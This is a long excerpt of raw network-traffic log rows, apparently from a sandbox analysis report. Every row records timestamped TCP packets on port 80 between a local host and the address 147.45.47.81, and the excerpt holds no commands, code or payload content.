                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545036077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545044899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545053005 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545054913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545067072 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545092106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545258045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545273066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545284033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545293093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545301914 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545303106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545320034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545335054 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545452118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545463085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545471907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545505047 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545613050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545623064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545631886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545641899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545651913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545660973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545664072 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545670986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545680046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545689106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545702934 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545804977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545814037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545862913 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545969963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545980930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.546016932 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.546260118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.546349049 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571129084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571162939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571176052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571186066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571197033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571217060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571217060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571332932 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571588993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571686029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571696997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571718931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571794987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.571794987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625161886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625181913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625188112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625227928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625237942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625248909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625258923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625271082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625312090 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625312090 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625312090 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625396967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625585079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625596046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.625628948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.627763033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.627919912 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.627921104 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.628287077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.628859043 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.633861065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.633877039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.633969069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634135962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634146929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634156942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634161949 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634167910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634180069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634188890 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.634236097 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641282082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641432047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641444921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641455889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641467094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641479015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641489983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641500950 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641511917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641524076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641524076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641552925 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641572952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641585112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641590118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641601086 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641628981 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641658068 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641748905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641762018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641772985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641798973 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641844988 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641930103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641943932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641956091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641968012 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.641979933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642107010 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642117977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642128944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642132044 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642132044 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642139912 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642151117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642160892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642173052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642309904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642309904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642309904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642309904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642779112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642793894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.642930984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643110037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643121004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643141985 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643207073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643290043 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643301964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643311024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643335104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643343925 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643345118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643387079 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643387079 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643434048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643636942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643650055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643660069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643666029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643671989 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643676996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643683910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643699884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643748999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643793106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643805027 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643815041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643825054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.643883944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644382000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644392014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644402981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644529104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644540071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644571066 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644571066 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644715071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644726992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644736052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644746065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644754887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644764900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644774914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644783974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644792080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644800901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644810915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644819975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644828081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644836903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644846916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644856930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644884109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644884109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644884109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644885063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644885063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644885063 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.644939899 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645742893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645756006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645767927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645777941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645787954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645797014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645807028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645817995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645828009 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645828009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645828009 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645843029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.645936966 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.648248911 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.767049074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.769556999 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.867124081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.867198944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.947707891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956085920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956100941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956110954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956121922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956165075 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956176996 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956195116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956213951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956223965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956234932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956243992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956254005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956254959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956264019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956273079 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956273079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956284046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956293106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956302881 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956306934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956315994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956321001 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956325054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956335068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956345081 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956348896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956358910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956367970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956372976 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956376076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956384897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956393957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956403971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956402063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956412077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956414938 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956422091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956432104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956440926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956449986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956449986 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956459045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956468105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956473112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956482887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956494093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956501961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956501961 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956511974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956520081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956526995 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956531048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956540108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956549883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956551075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956561089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956569910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956579924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956588984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956598043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956609964 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956613064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956619024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956619024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956623077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956631899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956638098 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956670046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956687927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956840038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956850052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956860065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956868887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956888914 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.956914902 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957142115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957158089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957212925 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957314968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957325935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.957340002 CET8049958147.45.47.81192.168.2.10
